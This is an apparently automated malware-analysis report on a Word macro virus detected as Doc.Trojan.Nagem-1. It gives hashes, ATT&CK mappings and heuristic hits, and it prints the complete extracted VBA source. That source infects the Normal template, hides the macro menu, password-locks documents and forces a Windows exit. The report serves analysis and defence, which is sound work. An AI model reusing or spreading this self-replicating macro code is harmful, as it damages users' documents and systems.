Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 79ccb83d6a165520…

MALICIOUS

Office (OLE)

Size: 60.5 KB
Created: 2001-01-12 09:02:00
Authoring application: Microsoft Word 9.0
First seen: 2015-09-30
MD5: a97bb5543bc31d9025aaa646627db4e0
SHA-1: c4f38c74fb201d279e0be7c67c39a364b3c72268
SHA-256: 79ccb83d6a16552002a0dd4a7693e8e0976b042476d497e9df0d5fcef1d7e0f8
Risk score: 256

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder

The sample is a legacy Word document containing VBA macros, detected by ClamAV as Doc.Trojan.Nagem-1. Its AutoOpen macro attempts to infect the Normal.dot template by exporting the 'Magan_Macro' component to a .BAS file and importing it into Normal, a classic technique for establishing persistence and spreading to other documents. The legacy WordBasic markers and the AutoOpen/AutoClose macros further indicate a macro-based threat.

Heuristics (6)

  • ClamAV: Doc.Trojan.Nagem-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Nagem-1
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Matched line in script:
        Shell "RunDLL.EXE USER,ExitWindows", vbHide
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched line in script:
        Sub AutoOpen()
  • Auto_Close macro [low] OLE_VBA_AUTOCLOSE
    Matched line in script:
        Sub AutoClose()
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3508 bytes
SHA-256: 56c4b59354097f09bc2b189adca38501d8e560f4c31601415f5f7871ba425fc9
Detection: ClamAV: Doc.Trojan.Nagem-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1TemplateProject.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Magan_Macro"
' Distributed for Changes/Upgradation etc. in
'Open Source Code.
' If you are interested in developing,modifying,
'crypting etc. this document using your skills,
'you are FREE to do so.
' Don't forget to give credits also to
'"Anonymous Creater of Megan V1.0"
' Nick of course is Magan
' Best of Luck
' Explanation Also Included.

Dim Ni, Di As Integer
Sub AutoOpen()
'There are no destructive routines in
'this document.
On Error GoTo 1

'Find if Normal is already infected!
With Normal.ThisDocument.VBProject.VBComponents
    For Ni = 1 To .Count
            If (.Item(Ni).Name = "Magan_Macro") Then
                GoTo 3
            End If
    Next Ni
End With

'Infect Normal
With ThisDocument.VBProject.VBComponents
    For Di = 1 To .Count
       If (.Item(Di).Name = "Magan_Macro") Then
          .Item(Di).Export ("MaganM.BAS")
          ' I know that the above is not the best way, still,
          'It is the easiest to understand.
          Normal.ThisDocument.VBProject.VBComponents.Add(1).CodeModule.AddFromFile ("MaganM.BAS")
          Kill ("MaganM.BAS")
          Exit For
       End If
Next Di
End With

GoTo 2

3

With ActiveDocument.VBProject.VBComponents
For Ni = 1 To .Count
            If (.Item(Ni).Name = "Magan_Macro") Then
                GoTo 1
            End If
Next Ni
End With

With Normal.ThisDocument.VBProject.VBComponents
For Di = 1 To .Count
       If (.Item(Di).Name = "Magan_Macro") Then
          .Item(Di).Export ("MaganM.BAS")
          ActiveDocument.VBProject.VBComponents.Add(1).CodeModule.AddFromFile ("MaganM.BAS")
          Kill ("MaganM.BAS")
          Exit For
       End If
Next Di
End With
ActiveDocument.Saved = False
2
Normal.ThisDocument.Saved = False
1
End Sub

Sub ToolsMacro()
Attribute ToolsMacro.VB_Description = "Disables the Tools->Macro->Macros... command under English version of Word."
Attribute ToolsMacro.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.ToolsMacro1"
'This macro disables the Tools->Macros->Macros...
'Command under English version of Word.

'If you are here, you know the in and out of the
'macro programming i belive.
MsgBox "This Command is Unavaliable this time.", vbCritical, "Microsoft Word"
End Sub


Sub AutoClose()
'No fun without an activation routine.
On Error Resume Next
If (Val(Left$(Date$, 2)) > 20) Then
    'Change "password" to Rnd*100 if you like!
    'Then, the document can never be unprotected again.
    ActiveDocument.Protect wdAllowOnlyComments, , "password"
End If
If (Val(Left$(Date$, 2)) > 10) Then
    If (Rnd * 100 < 50) Then
       'Quits without saving :)
       'Then tries Restarts the Computer
       'Restart works only if there is a delay
       Shell "RunDLL.EXE USER,ExitWindows", vbHide
       ThisDocument.Application.Quit
    End If
End If
End Sub

Sub FileSave()
'Just to Spread.
'Note : Works only under English Version.
On Error Resume Next
AutoOpen
ActiveDocument.Save
End Sub

Sub FileSaveAs()
'Just to Spread.
'Note : Works only under English Version.
On Error Resume Next
AutoOpen
Dialogs(wdDialogFileSaveAs).Show
AutoOpen
End Sub